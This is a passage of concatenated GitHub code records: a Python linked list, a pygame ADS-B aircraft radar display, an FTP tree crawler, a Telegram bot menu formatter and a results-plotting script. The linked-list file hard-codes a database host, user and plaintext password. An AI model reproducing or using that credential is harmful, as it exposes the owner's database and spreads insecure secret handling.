print(cur.item)\n\n\n\n    def add(self, item):\n        \"\"\"\n        头部增加节点\n        :param item: 节点值\n        :return:\n        \"\"\"\n\n        node = Node(item) # 创建节点对象\n        node.next = self._head # 新增节点指向self._head指向的节点\n        self._head = node # self._head 指向新增node节点\n\n    def append(self, item):\n        \"\"\"\n        尾部增加节点\n        :param item: 节点值\n        :return:\n        \"\"\"\n        cur = self._head\n        if not cur:\n            self.add(item)\n        else:\n            node = Node(item)\n            while cur.next != None:\n                cur = cur.next\n            cur.next = node\n\n\n\n    def insert(self, index, item):\n        '''插入元素'''\n        if index == 0:\n            self.add(item)\n        elif index >= self.length():\n            self.append(item)\n        else:\n            cur = self._head\n            n = 1\n            node = Node(item)\n            pre = None\n            while cur.next != None:\n                if n != index:\n                    pre = cur\n                    cur = cur.next\n                    n += 1\n                else:\n                    pre.next = node\n                    node.next = cur\n                    break\n\n\n    def remove(self, item):\n        '''移除元素'''\n        if self.is_empty():\n            raise ValueError('null node')\n        cur = self._head\n        if cur.item == item:\n            self._head = cur.next\n        while cur.next:\n            pre = cur\n            cur = cur.next\n            if cur.item == item:\n                pre.next = cur.next\n\n    def search(self, item):\n        \"\"\"查找元素\"\"\"\n        cur = self._head\n        while None != cur:\n            if cur.item == item:\n                return True\n            cur = cur.next\n        return False\n\n\nMDC_DB_DICT = {\n    \"host\": \"192.168.1.243\",\n    \"port\": 3306,\n    \"user\": \"readonly\",\n    \"password\": \"3XhZ9pYduyKn\",\n    \"database\": \"mdc\",\n    \"charset\": \"utf8\",\n}\n\n{\n    'db': 'mdc',\n    'USER': 'readonly',\n    'PASSWORD': '3XhZ9pYduyKn',\n    'HOST': '192.168.1.243',\n    'PORT': 3306,\n}\n\n\nif __name__ == '__main__':\n    single = SingleLinkList()\n    single.add(11)\n    single.add(22)\n    print(single.is_empty())\n    single.ergodic()\n    single.remove(2)\n    single.remove(1)\n    single.ergodic()\n    print(single.search(22))\n\n\n\n","repo_name":"281234086/data_struct","sub_path":"struct/linklist/single_link.py","file_name":"single_link.py","file_ext":"py","file_size_in_byte":3236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41683867364","text":"import pygame\nimport sys\nimport time\nimport threading\nfrom serial import Serial\nimport subprocess\nimport json\nimport urllib.request\nimport math\n\n# Dump1090 starten\np = subprocess.Popen(['sudo', './dump1090', '--quiet', '--net'], cwd=\"/home/adsbpi/dump1090\")\nurl = \"http://localhost:8080/data/aircraft.json\"\n\n# Pygame initialisiern\npygame.init()\n\n# FÜR PR0GRAMMIEREN IMMER FALSE\nVollbild = True\n\n# Variablen\ngps_thread_running = True\t# Läuft der GPS-Thread\ngps_signal = False\t\t# GPS-Signalempfang\nplanedetec_raw = 0\t\t# Anzahl an detektierter Flugzeuge\nplanedetec_loc = 0\t\t# Anzahl an detek. Flug. mit Koordinaten\nlat = 48.8\t\t\t# Eigene Position Breitengrad\nlon = 9.2\t\t\t# Eigene Position Längengrad\nsats = 0\t\t\t# Anzahl GPS-Satelliten in Verwendung\nalt = 100\t\t\t# GPS-Antennenhöhe über NN in m\nspeed = 0\t\t\t# GPS-Geschwindigkeit in kt\ncourse = 0\t\t\t# Eigener Kurs / Winkel zum Nordpol\nmaprotation = 0\t\t\t# Verdrehung der Karte\ndeadtime1 = 10\t\t\t# Zeit seit dem letzten Signal, ab wann markiert wird\ndeadtime2 = 30\t\t\t# ...
, ab wann nicht mehr anzeigen (Dump1090 intern ab 300s)\nscale = 0.1\t\t\t# Maßstab (km pro Pixel)\nscale_alt = 100.0\t\t# Zur Detektion, ob Kompass neu berechnet werden muss\n\nRadio = True\t\t\t# Ob Funkrufname angezeigt werden soll, sonst ICAO-Code\nInfo = True\t\t\t# Ob Weitere Informationen (Höhe, Course, Speed) angezeigt werden\nHide = False\t\t\t# Ob ab großer Höhendifferenz nur vermindert dargestellt wird\ndeltaH = 2000\t\t\t# Höhendifferenzschwelle in ft für Hide\n\n# Bildschirmmaße definieren\nscreen_width = 800\nif Vollbild:\n\tscreen_height = 480\nelse:\n\tscreen_height = 420\nscreen = (screen_width, screen_height)\nMenuebreite = 100\nMenuekante = int(screen_width - Menuebreite)\nRandbreite = 10\n\n# Eigene Positon im Bildschirm\ncenterposx = (screen_width - Menuebreite) / 2 + 0\ncenterposy = screen_height / 2 + 0\ncenterpos = (int(centerposx), int(centerposy))\n\n# Farben definieren\nwhite = (255, 255, 255)\ngray = (128, 128 ,128)\ndarkgray = (40, 40, 40)\nblack = (0, 0, 0)\nred = (255, 0, 0)\ngreen = (0, 128, 0) \n\n# Maus ausblenden\nmauszeit = 10\nlast_mouse_movement = time.time()\npygame.mouse.set_visible(True)\n\n# Fenster erstellen und Fenstertitel vergeben\nif Vollbild:\n\tscreen = pygame.display.set_mode(screen , pygame.FULLSCREEN)\nelse:\n\tscreen = pygame.display.set_mode(screen , pygame.RESIZABLE)\npygame.display.set_caption('ADS-B Empfänger Version 1')\n\n# Schriftarten definieren\nfont = pygame.font.Font(None, 27)\nfontS = pygame.font.Font(None, 20)\nIconfont = pygame.font.Font('/home/adsbpi/ADS-B_Empfaenger/fa-solid-900.ttf', 40)\n\n# Zoom-Button Eigenschaften\nzoomI_btn_width = Menuebreite\nzoomO_btn_width = zoomI_btn_width\nzoomI_btn_height = 70\nzoomO_btn_height = zoomI_btn_height\nzoomI_btn_x = screen_width - zoomI_btn_width\nzoomO_btn_x = screen_width - zoomO_btn_width\nzoomI_btn_y = screen_height - zoomI_btn_height\nzoomO_btn_y = screen_height - zoomO_btn_height - zoomI_btn_height - 5\n\n# Info-Button Eigenschaften\ninfo_btn_width = Menuebreite\ninfo_btn_height = zoomI_btn_height\ninfo_btn_x = screen_width - info_btn_width\ninfo_btn_y = zoomO_btn_y - info_btn_height - 5\n\n# Hide-Button Eigenschaften\nhide_btn_width = Menuebreite\nhide_btn_height = zoomI_btn_height\nhide_btn_x = screen_width - hide_btn_width\nhide_btn_y = info_btn_y - hide_btn_height - 5\n\n\n###--FUNKTIONEN--------------------\n\n# GPS initialisieren und Starten des Threads\ngps = Serial('/dev/ttyS0', 9600)\n\ndef read_gps_data():\n\tglobal lat\n\tglobal lon\n\tglobal alt\n\tglobal gps_signal\n\tglobal gps_thread_running\n\tglobal sats\n\tglobal speed\n\tglobal course\n\twhile gps_thread_running:\t\n\t\tline = gps.readline().decode('utf-8')\n\t\tif line.startswith('$GPGGA'):\n\t\t\tdata = line.split(',')\n\t\t\tif data[2]:\n\t\t\t\tgps_signal = True\n\t\t\t\tlat = float(data[2][:2]) + float(data[2][2:]) / 60\n\t\t\t\tlon = float(data[4][:3]) + float(data[4][3:]) / 60\n\t\t\telse:\n\t\t\t\tgps_signal = False\n\t\t\tif data[7]:\n\t\t\t\tsats = int(data[7])\n\t\t\telse:\n\t\t\t\tsats = 99\n\t\t\tif data[9]:\n\t\t\t\talt = int(float(data[9]))\n\t\tif line.startswith('$GPVTG'):\n\t\t\tdata = line.split(',')\n\t\t\tif data[5]:\n\t\t\t\tspeed = float(data[5])\n\t\t\tif data[1]:\n\t\t\t\tcourse = float(data[1])\n\t\ttime.sleep(0.1)\n\ngps_thread = threading.Thread(target=read_gps_data)\ngps_thread.start()\n\n# Abstandsbestimmungsfunktion anhand der Haversine Formel\ndef Abstand(lat, lon, planelat, planelon):\n\tR = 6371\t# Erdradius in Kilometern\n\tphi1 = math.radians(lat)\n\tphi2 = 
math.radians(planelat)\n\td_phi = math.radians(planelat - lat)\n\td_lambda = math.radians(planelon - lon)\n\ta = math.sin(d_phi / 2)**2 + math.cos(phi1) * math.cos(phi2) * math.sin(d_lambda / 2)**2\n\tc = 2* math.atan2(math.sqrt(a), math.sqrt(1-a))\n\td = R * c\n\treturn d\n\n# Winkelbestimmung \ndef Winkel(lat, lon, planelat, planelon):\n\tphi1 = math.radians(lat)\n\tphi2 = math.radians(planelat)\n\td_lambda = math.radians(planelon - lon)\n\tx = math.cos(phi2) * math.sin(d_lambda)\n\ty = math.cos(phi1) * math.sin(phi2) - math.sin(phi1) * math.cos(phi2) * math.cos(d_lambda)\n\ttheta = math.atan2(x,y)\n\talpha = math.degrees(theta)\n\treturn alpha\n\n# Pixelkoordinaten bestimmen\ndef getPixelx(planedist, planeangl):\n\tglobal overedge\n\tangl = planeangl - maprotation\n\tdist = planedist / scale\n\tx = int(round(math.sin(math.radians(angl)) * dist))\n\tif x > ((screen_width - Menuebreite) / 2 - Randbreite - 10):\n\t\toveredge = True\n\t\tx = ((screen_width - Menuebreite) / 2 - Randbreite - 10)\n\tif x < ((screen_width - Menuebreite) / -2 + Randbreite):\n\t\toveredge = True\n\t\tx = ((screen_width - Menuebreite) / -2 + Randbreite)\n\treturn x\n\ndef getPixely(planedist, planeangl):\n\tglobal overedge\n\tangl = planeangl - maprotation\n\tdist = planedist / scale\n\ty = int(round(math.cos(math.radians(angl)) * dist))\n\tif y > (screen_height / 2 - Randbreite):\n\t\toveredge = True\n\t\ty = (screen_height / 2 - Randbreite)\n\tif y < (screen_height / -2 + Randbreite):\n\t\toveredge = True\n\t\ty = (screen_height / -2 + Randbreite)\n\treturn y\n\n# Flugzeugsymbol zeichnen\ndef drawPlane(coords, color, dir, size, type):\n\tif type == 0:\n\t\tsymb = chr(0xE22D) # Flugzeug normal\n\telif type == 1:\n\t\tsymb = chr(0xE518) # Kampfjet\n\telif type == 2:\n\t\tsymb = chr(0xF533) # Helikopter\n\telif type == 3:\n\t\tsymb = chr(0xF188) # Bug\n\telif type == 4:\n\t\tsymb = chr(0xF535) # unflyable\n\telif type == 5:\n\t\tsymb = chr(0xF6E2) # Boo\n\telif type == 6:\n\t\tsymb = chr(0xF67B) # FSM\n\tPlanefont = pygame.font.Font('/home/adsbpi/ADS-B_Empfaenger/fa-solid-900.ttf', size)\n\tPlanetext = Planefont.render(symb , True, color)\n\tPlanetext = pygame.transform.rotate(Planetext, -dir + maprotation)\n\tPlanetext_rect = Planetext.get_rect()\n\tPlanetext_rect.center = coords\n\tscreen.blit(Planetext, Planetext_rect)\n\treturn\n\n# Kompass berechnen\ndef calcKompass():\n\tmaxRad = centerposy - 10\n\tTeiler = [200, 150, 100, 75, 50, 40, 30, 20, 10, 7.5, 5, 3, 2, 1, 0.5, 0.2, 0.1]\n\tglobal Radiuskm\n\tglobal Radiuspx\n\tmaxGef = False\n\tfor wert in Teiler:\n\t\tif (wert/scale) < maxRad and maxGef == False:\n\t\t\tRadiuskm = wert\n\t\t\tRadiuspx = int(Radiuskm / scale)\n\t\t\tmaxGef = True\n\treturn\n\n# Kompass zeichen\ndef drawKompass():\n\tpygame.draw.circle(screen, black, centerpos, Radiuspx , 1)\n\ttext = str(Radiuskm) + \" km\"\n\ttext_width, text_height = font.size(text)\n\tscreen.blit(font.render(text, True, black), (centerposx - (text_width / 2), int(centerposy + Radiuspx - 25)))\n\treturn\n\n# Infos an Symbol anzeigen\ndef drawInfo(planepos,info1,info2,info3,info4):\n\tscreen.blit(fontS.render(str(info1), True, black), tuple(map(sum, zip(planepos,(-20,20)))))\n\tif info2:\n\t\tscreen.blit(fontS.render(str(info2), True, black), tuple(map(sum, zip(planepos,(-20,33)))))\n\t\tscreen.blit(fontS.render(str(info3), True, black), tuple(map(sum, zip(planepos,(-20,46)))))\n\t\tscreen.blit(fontS.render(str(info4), True, black), tuple(map(sum, 
zip(planepos,(-20,59)))))\n\treturn\n\npygame.display.update()\ntouchsize = 40\nOwnPlanetype = 0\n\nrunning = True\nwhile running:\n\t# Events überprüfen\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.QUIT:\n\t\t\tpygame.quit()\n\t\t\tquit()\n\t\telif event.type == pygame.MOUSEMOTION:\n\t\t\tlast_mouse_movement = time.time()\n\t\telif event.type == pygame.KEYDOWN:\n\t\t\tif event.key == pygame.K_ESCAPE:\n\t\t\t\trunning = False\n\t\telif event.type == pygame.MOUSEBUTTONDOWN:\n\t\t\tmouse_pos = pygame.mouse.get_pos()\n\t\t\tif zoomI_btn_x <= mouse_pos[0] <= zoomI_btn_x + zoomI_btn_width and zoomI_btn_y <= mouse_pos[1] <= zoomI_btn_y + zoomI_btn_height:\n\t\t\t\tscale *= 0.9\n\t\t\t\tif scale < 0.0005:\n\t\t\t\t\tscale = 0.0005\n\t\t\tif zoomO_btn_x <= mouse_pos[0] <= zoomO_btn_x + zoomO_btn_width and zoomO_btn_y <= mouse_pos[1] <= zoomO_btn_y + zoomO_btn_height:\n\t\t\t\tscale *= 1.1\n\t\t\t\tif scale > 2:\n\t\t\t\t\tscale = 2\n\t\t\tif info_btn_x <= mouse_pos[0] <= info_btn_x + info_btn_width and info_btn_y <= mouse_pos[1] <= info_btn_y + info_btn_height:\n\t\t\t\tif Info:\n\t\t\t\t\tInfo = False\n\t\t\t\telse:\n\t\t\t\t\tInfo = True\n\t\t\tif hide_btn_x <= mouse_pos[0] <= hide_btn_x + hide_btn_width and hide_btn_y <= mouse_pos[1] <= hide_btn_y + hide_btn_height:\n\t\t\t\tif Hide:\n\t\t\t\t\tHide = False\n\t\t\t\telse:\n\t\t\t\t\tHide = True\n\t\t\tif centerposx - touchsize <= mouse_pos[0] <= centerposx + touchsize and centerposy - touchsize <= mouse_pos[1] <= centerposy + touchsize:\n\t\t\t\tOwnPlanetype += 1\n\t\t\t\tif OwnPlanetype > 6:\n\t\t\t\t\tOwnPlanetype = 0\n\n\t# Maus ausblenden\n\tif time.time() - last_mouse_movement > mauszeit:\n\t\tpygame.mouse.set_visible(False)\n\telse:\n\t\tpygame.mouse.set_visible(True)\n\n\t# Hintergrund einfärben\n\tscreen.fill(white)\n\tpygame.draw.line(screen, gray, [Menuekante - 4, 0], [Menuekante - 4, screen_height], 2)\n\n\t# Kompass zeichen\n\tif scale != scale_alt:\n\t\tcalcKompass()\n\tdrawKompass()\n\tscale_alt = scale\n\n\t# Variable anzeigen\n\tlattext = font.render(str(round(lat, 5)), True, black)\n\tlontext = font.render(str(round(lon, 5)), True, black)\n\tcoursetext = font.render((str(int(course))+ \" °\"), True, black)\n\tspeedtext = font.render((str(int(speed))+ \" kt\"), True, black)\n\talttext = font.render((str(alt)+ \" m\"), True, black)\n\tscreen.blit(lattext, (Menuekante, 30))\n\tscreen.blit(lontext, (Menuekante, 50))\n\tscreen.blit(coursetext, (Menuekante, 80))\n\tscreen.blit(speedtext, (Menuekante, 100))\n\tscreen.blit(alttext, (Menuekante, 120))\n\n\t# GPS-Status anzeigen\n\tif gps_signal:\n\t\tscreen.blit(font.render(\"GPS\", True, green), (Menuekante, 6))\n\telse:\n\t\tscreen.blit(font.render(\"Kein GPS\", True, red), (Menuekante, 6))\n\n\t#Zoom-In-Button Schaltfläche\n\tpygame.draw.rect(screen, gray, (zoomI_btn_x, zoomI_btn_y, zoomI_btn_width, zoomI_btn_height))\n\tzoomItext = Iconfont.render(chr(0xF00E), True, white)\n\tzoomItext_rect = zoomItext.get_rect(center=(zoomI_btn_x + zoomI_btn_width // 2, zoomI_btn_y + zoomI_btn_height // 2))\n\tscreen.blit(zoomItext, zoomItext_rect)\n\n\t#Zoom-Out-Button Schaltfläche\n\tpygame.draw.rect(screen, gray, (zoomO_btn_x, zoomO_btn_y, zoomO_btn_width, zoomO_btn_height))\n\tzoomOtext = Iconfont.render(chr(0xF010), True, white)\n\tzoomOtext_rect = zoomOtext.get_rect(center=(zoomO_btn_x + zoomO_btn_width // 2, zoomO_btn_y + zoomO_btn_height // 2))\n\tscreen.blit(zoomOtext, zoomOtext_rect)\n\n\t#Info-Button Schaltfläche\n\tif Info:\n\t\tinfocolor = 
darkgray\n\telse:\n\t\tinfocolor = gray\n\tpygame.draw.rect(screen, infocolor, (info_btn_x, info_btn_y, info_btn_width, info_btn_height))\n\tinfotext = Iconfont.render(chr(0xF05A), True, white)\n\tinfotext_rect = infotext.get_rect(center=(info_btn_x + info_btn_width // 2, info_btn_y + info_btn_height // 2))\n\tscreen.blit(infotext, infotext_rect)\n\n\t#Hide-Button Schaltfläche\n\tif Hide:\n\t\thidecolor = darkgray\n\t\thidechr = chr(0xF070)\n\telse:\n\t\thidecolor = gray\n\t\thidechr = chr(0xF06E)\n\tpygame.draw.rect(screen, hidecolor, (hide_btn_x, hide_btn_y, hide_btn_width, hide_btn_height))\n\thidetext = Iconfont.render(hidechr, True, white)\n\thidetext_rect = hidetext.get_rect(center=(hide_btn_x + hide_btn_width // 2, hide_btn_y + hide_btn_height // 2))\n\tscreen.blit(hidetext, hidetext_rect)\n\n\t# Eigene Position darstellen\n\tdrawPlane(centerpos, green, course ,40, OwnPlanetype)\n\n\t# Dump1090 auslesen\n\tresponse = urllib.request.urlopen(url)\n\tdata = json.loads(response.read())\n\tplanedetec_raw = 0\n\tplanedetec_loc = 0\n\tfor aircraft in data['aircraft']:\n\t\tif aircraft.get('seen') < deadtime2:\n\t\t\tplanedetec_raw += 1\n\t\t\tif 'lat' in aircraft:\n\t\t\t\tplanedetec_loc += 1\n\t\t\t\toveredge = False\n\t\t\t\tisGround = False\n\t\t\t\tplanelat = aircraft.get('lat')\n\t\t\t\tplanelon = aircraft.get('lon')\n\t\t\t\tplanealt = aircraft.get('altitude')\n\t\t\t\tif isinstance(planealt,(int)) == False:\n\t\t\t\t\tif planealt == \"ground\":\n\t\t\t\t\t\tisGround = True\n\t\t\t\t\tplanealt = 0\n\t\t\t\tplanedist = Abstand(lat, lon, planelat, planelon)\n\t\t\t\tplaneangl = Winkel(lat, lon, planelat, planelon)\n\t\t\t\tplanepixelpos = (int(centerposx + getPixelx(planedist, planeangl)), int(centerposy - getPixely(planedist, planeangl)))\n\t\t\t\tif aircraft.get('seen_pos') > deadtime1:\n\t\t\t\t\tplanecolor = gray\n\t\t\t\telse:\n\t\t\t\t\tplanecolor = black\n\t\t\t\tif overedge or (Hide and planealt > (alt*3.28 + deltaH )):\n\t\t\t\t\tplanesize = 20\n\t\t\t\telse:\n\t\t\t\t\tplanesize = 30\n\t\t\t\t\tinfo2 = \"\"\n\t\t\t\t\tinfo3 = \"\"\n\t\t\t\t\tinfo4 = \"\"\n\t\t\t\t\tif 'flight' in aircraft and Radio:\n\t\t\t\t\t\tinfo1 = aircraft.get('flight')\n\t\t\t\t\telse:\n\t\t\t\t\t\tinfo1 = aircraft.get('hex')\n\t\t\t\t\tif Info:\n\t\t\t\t\t\tif isGround:\n\t\t\t\t\t\t\tinfo2 = \"GROUND\"\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tinfo2 = str(planealt) + \" ft\"\n\t\t\t\t\t\tinfo3 = str(aircraft.get('track')) + \" °\"\n\t\t\t\t\t\tinfo4 = str(aircraft.get('speed')) + \" kt\"\n\t\t\t\t\tdrawInfo(planepixelpos, info1, info2, info3, info4)\n\t\t\t\tdrawPlane((planepixelpos), planecolor, aircraft.get('track',0), planesize, 0)\n\n\t# Debug-Anzeige in Menueleiste\n\tdebugtext = fontS.render((\"R\" + str(planedetec_raw) + \" / L\" + str(planedetec_loc) + \" / S\" + str(sats)), True, black)\n\tscreen.blit(debugtext, (Menuekante, hide_btn_y-15))\n\n\tpygame.display.update()\n\tpygame.time.Clock().tick(60)\n\n# Abbruchroutine\np.terminate()\ngps_thread_running = False\ngps_thread.join()\npygame.quit()\nsys.exit()\n","repo_name":"Waages/ADS-B_Empfaenger","sub_path":"adsb_receiver.py","file_name":"adsb_receiver.py","file_ext":"py","file_size_in_byte":13620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24075657344","text":"#! 
/usr/bin/env python\n\nimport os\nimport sys\nimport time\nimport json\nimport ftplib\nimport random\nimport logging\nimport datetime\n\n# Object to access FTP site\nclass FTPConnection(object):\n def __init__(self, host, parser=None):\n self.host = host\n self.failed_attempts = 0\n self.max_attempts = 5\n self.stop_when_connected()\n \n if parser is None:\n # try to guess on first access\n logging.info(\"No parser provided; will guess on first attempt.\")\n self._listfn = None\n elif callable(parser):\n # supply a custom listing parser\n logging.info(\"Supplied a custom dir listing parser.\")\n self._listfn = parser\n elif parser == 'mlsd':\n logging.info(\"Set parser to MLSD.\")\n self._listfn = self._list_mlsd\n elif parser == 'unix':\n logging.info(\"Set parser to UNIX.\")\n self._listfn = self._list_unix\n elif parser == 'windows':\n logging.info(\"Set parser to WINDOWS.\")\n self._listfn = self._list_windows\n \n def _connect(self):\n # attempt an anonymous FTP connection\n logging.info(\"CONNECT %s ATTEMPT\", self.host)\n self.ftp = ftplib.FTP(self.host, timeout=60)\n self.ftp.login()\n logging.info(\"CONNECT %s SUCCESS\", self.host)\n \n def stop_when_connected(self):\n # continually tries to reconnect ad infinitum\n try:\n self._connect()\n except ftplib.all_errors:\n logging.warning(\"CONNECT %s FAILED; trying again...\", self.host)\n time.sleep(5 * random.uniform(0.5, 1.5))\n self.stop_when_connected()\n \n def _list(self, path):\n # public fn to get a path listing\n # guesses the format if it's not explicitly set\n try:\n return self._listfn(path)\n except AttributeError:\n # self._listfn is not defined;\n # try to guess it\n self._listfn = self._guess_parser(path)\n return self._listfn(path)\n \n def _guess_parser(self, path):\n # also check out this library: http://cr.yp.to/ftpparse.html\n logging.info(\"Guessing FTP listing parser for %s...\", self.host)\n try:\n lines = []\n self.ftp.retrlines('MLSD %s' % path, lines.append)\n logging.info(\"Guessing parser: MLSD success\")\n return self._list_mlsd\n except ftplib.all_errors:\n logging.info(\"Guessing parser: MLSD fail\")\n \n # not MLSD, so:\n # get a listing and check a few properties\n dir_in_3rd = lambda line: \"
\" in line.split()[2]\n numeric_first_letter = lambda line: line[0] >= '0' and line[0] <= '9'\n unix_first_letter = lambda line: line[0] in 'd-lpsbc'\n \n lines = []\n self.ftp.retrlines('LIST %s' % path, lines.append)\n \n # check for windows\n if (any(map(dir_in_3rd, lines)) and\n all(map(numeric_first_letter, lines))):\n logging.info(\"Guessing parser: WINDOWS\")\n return self._list_windows\n \n # check for unix\n if all(map(unix_first_letter, lines)):\n logging.info(\"Guessing parser: UNIX\")\n return self._list_unix\n \n logging.error('\\n'.join(lines))\n raise RuntimeError(\"Failed to guess parser.\")\n \n # these functions interact with the FTP with no error checking\n # they just take a path and try to return properly-formatted data\n def _list_mlsd(self, path):\n # copy of MLSD impl from Python 3.3 ftplib package that returns\n # listing data in a machine-readable format\n cmd = 'MLSD %s' % path\n lines = []\n self.ftp.retrlines(cmd, lines.append)\n results = []\n for line in lines:\n facts_found, _, name = line.rstrip('\\r\\n').partition(' ')\n entry = {}\n for fact in facts_found[:-1].split(\";\"):\n key, _, value = fact.partition(\"=\")\n entry[key.lower()] = value\n results.append((name, entry))\n return results\n \n def _list_windows(self, path):\n lines = []\n self.ftp.dir(path, lines.append)\n results = []\n for line in lines:\n fields = line.split()\n name = ' '.join(fields[3:])\n size = -1\n if fields[2].strip() == '':\n type_ = 'dir'\n else:\n type_ = 'file'\n size = int(fields[2])\n results.append((name, {'type': type_, 'size': size}))\n return results\n \n def _list_unix(self, path):\n lines = []\n self.ftp.dir(path, lines.append)\n results = []\n for line in lines:\n fields = line.split()\n name = ' '.join(fields[8:])\n size = -1\n if line[0] == 'd':\n type_ = 'dir'\n elif line[0] == '-':\n type_ = 'file'\n size = int(fields[4])\n elif line[0] == 'l':\n continue\n else:\n raise ValueError(\"Don't know what kind of file I have: %s\" % line.strip())\n results.append((name, {'type': type_, 'size': size}))\n return results\n \n # this function actually handles the logic of pulling data\n # it tries a max of max_attempts times\n def process_path(self, path):\n while self.failed_attempts < self.max_attempts:\n try:\n results = self._list(path)\n logging.info(\"LIST SUCCESS %s\" % path)\n self.failed_attempts = 0\n return results\n except ftplib.all_errors:\n self.failed_attempts += 1\n self.ftp.close()\n logging.warning(\"LIST FAILED %s; Failed %i times out of %i; reconnecting...\", path, self.failed_attempts, self.max_attempts)\n time.sleep(2 * random.uniform(0.5, 1.5))\n self.stop_when_connected()\n \n # if I get here, I never succeeded in getting the data\n logging.warning(\"LIST ABANDONED %s\", path)\n self.failed_attempts = 0\n return False\n \n\n# Recursive building of FTP tree\ndef crawltree(ftp, tree):\n path = os.path.join(tree['ancestors'], tree['name'])\n results = ftp.process_path(path)\n if results == False:\n return tree\n \n for result in results:\n name = result[0]\n type_ = result[1]['type']\n if type_ == 'file':\n size = int(result[1]['size'])\n tree['children'][name] = {'name': name, 'ancestors': path, 'size': size, 'children': {}}\n logging.info(\"APPENDED file %s\", os.path.join(path, name))\n elif type_ == 'dir':\n tree['children'][name] = crawltree(ftp, {'name': name, 'ancestors': path, 'size': -1, 'children': {}})\n logging.info(\"PROCESSED dir %s\", os.path.join(path, name))\n \n return tree\n\n# Traverse tree and compute sizes for internal 
nodes\ndef computesize(tree):\n if tree['size'] > -1:\n return tree['size']\n \n size = 0\n for child in tree['children'].itervalues():\n size += computesize(child)\n \n tree['size'] = size\n return size\n\n\nif __name__ == '__main__':\n import argparse\n \n parser = argparse.ArgumentParser()\n parser.add_argument('config')\n parser.add_argument('--loglevel', default='INFO')\n args = parser.parse_args()\n \n with open(args.config, 'r') as ip:\n config = json.loads(ip.read())\n \n logging.basicConfig(filename=config['id'] + '.crawl.log',\n filemode='w',\n level=args.loglevel,\n format=\"%(levelname)s|%(asctime)s|%(message)s\")\n \n ftp = FTPConnection(config['host'], config['ftp_list_method']) \n tree = crawltree(ftp, {'name': '', 'ancestors': config['root_path'].strip('/'), 'size': -1, 'children': {}})\n tree['date'] = str(datetime.date.today())\n weight = computesize(tree)\n logging.info(\"TOTAL WEIGHT %i bytes\", weight)\n \n # dump json object\n with open(config['tree_file'], 'w') as op:\n json.dump(tree, op, encoding='ISO-8859-1')\n","repo_name":"laserson/ftptree","sub_path":"crawltree.py","file_name":"crawltree.py","file_ext":"py","file_size_in_byte":8232,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"20523028142","text":"from NekoGram import Neko, Menu, NekoRouter\nfrom . import util\nfrom aiogram import types\n\nROUTER: NekoRouter = NekoRouter(name='languages')\n\n\n@ROUTER.formatter()\nasync def widget_languages(data: Menu, _: types.User, __: Neko):\n markup: types.InlineKeyboardMarkup = types.InlineKeyboardMarkup()\n for lang in util.languages:\n text = util.replacements.get(lang, lang).upper()\n text = f'{chr(ord(text[0]) + 127397) + chr(ord(text[1]) + 127397)}{lang.upper()}'\n markup.add(types.InlineKeyboardButton(text=text, callback_data=f'widget_languages_set#{lang}'))\n await data.build(markup=markup)\n","repo_name":"lyteloli/NekoGramBMICalculator","sub_path":"NekoGram/widgets/languages/formatters.py","file_name":"formatters.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8740190615","text":"\"\"\"\nRead the learning results and make some plots.\n\"\"\"\nimport pickle\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom settings.initial_settings import *\n\n\ndef main():\n results_dir = os.path.join('./' + PROJECT + '/results/')\n results_file = results_dir + TRIAL + '.pkl'\n print(results_file)\n\n file_dir = results_dir + TRIAL + '/'\n if not os.path.exists(file_dir):\n os.makedirs(file_dir)\n\n file = open(results_file, 'rb')\n steps_history = pickle.load(file)\n success_history = pickle.load(file)\n fail_history = pickle.load(file)\n draw_history = pickle.load(file)\n alive_red_history = pickle.load(file)\n alive_blue_history = pickle.load(file)\n red_force_history = pickle.load(file)\n blue_force_history = pickle.load(file)\n episode_length_history = pickle.load((file)) # Available after fwd_4\n\n file.close()\n\n \"\"\"\n print(steps_history)\n print(success_history)\n print(fail_history)\n print(draw_history)\n print(alive_red_history)\n print(alive_blue_history)\n print(red_force_history)\n print(blue_force_history)\n \"\"\"\n\n plt.plot(steps_history, success_history, label='success', color='r')\n plt.plot(steps_history, fail_history, label='fail', color='b')\n plt.plot(steps_history, draw_history, label='draw', color='g')\n plt.title(f'Number of success, fail, and draw during the 
training: {TRIAL}')\n plt.xlabel('steps')\n plt.ylabel('success, fail, draw episodes number')\n plt.ylim(0, 100)\n plt.grid()\n plt.legend()\n # plt.show()\n file_name = file_dir + 'success_ratio.png'\n plt.savefig(file_name)\n plt.close()\n\n plt.plot(steps_history, alive_red_history, label='survived_red', color='r')\n plt.plot(steps_history, alive_blue_history, label='survived_blue', color='b')\n plt.title(f'Number of survived agents during the training: {TRIAL}')\n plt.xlabel('steps')\n plt.ylabel('mean survived agents number')\n plt.ylim(0, np.max([NUM_RED_MAX, NUM_BLUE_MAX]))\n plt.grid()\n plt.legend()\n # plt.show()\n file_name = file_dir + 'survived_agents.png'\n plt.savefig(file_name)\n plt.close()\n\n plt.plot(steps_history, red_force_history, label='red_force', color='r')\n plt.plot(steps_history, blue_force_history, label='blue_force', color='b')\n plt.title(f'Survived total force of agents during the training: {TRIAL}')\n plt.xlabel('steps')\n plt.ylabel('mean total force of survived agents')\n plt.ylim(0, np.max([RED_TOTAL_FORCE, BLUE_TOTAL_FORCE])/2)\n plt.grid()\n plt.legend()\n # plt.show()\n file_name = file_dir + 'survived_force.png'\n plt.savefig(file_name)\n plt.close()\n\n plt.plot(steps_history, episode_length_history)\n plt.title(f'Episode length during the training: {TRIAL}')\n plt.xlabel('steps')\n plt.ylabel('mean episode_length')\n plt.ylim(0, MAX_STEPS*1.1)\n plt.grid()\n file_name = file_dir + 'episode_length.png'\n plt.savefig(file_name)\n plt.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"DreamMaker-Ai/MultiAgent_BattleField","sub_path":"A_SimpleEnvironment/read_results.py","file_name":"read_results.py","file_ext":"py","file_size_in_byte":3009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5072464442","text":"import networkx as nx\nimport matplotlib.pyplot as plt\nimport random\nimport 